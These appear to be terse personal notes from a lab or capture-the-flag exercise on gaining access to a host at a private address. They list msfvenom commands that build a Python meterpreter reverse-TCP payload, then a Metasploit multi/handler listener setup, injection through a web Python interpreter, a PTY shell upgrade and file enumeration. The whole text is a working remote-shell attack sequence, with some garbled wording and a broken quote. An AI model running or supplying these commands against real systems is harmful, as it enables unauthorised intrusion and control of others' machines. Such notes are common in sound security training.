**msfvenom, gain access** TARGET: 172.16.60.91 msfvenom -p python/meterpreter/reverse_tcp lhost=172.16.60.x lport=9999 -f raw >shell.py msfconsole -q use exploit/multi/handler set payload python/meterpreter/reverse_tcp show options set lhost 172.16.60.78 set lport 9999 exploit -j cat shell.py copy content of shell.py paste ne python interpreter on web pret sessionin sessions sessions -i 1 getuid shell bash python -c 'import pty; pty.spawn(/bin/bash")' ls debugger.sh cat debugger.sh ...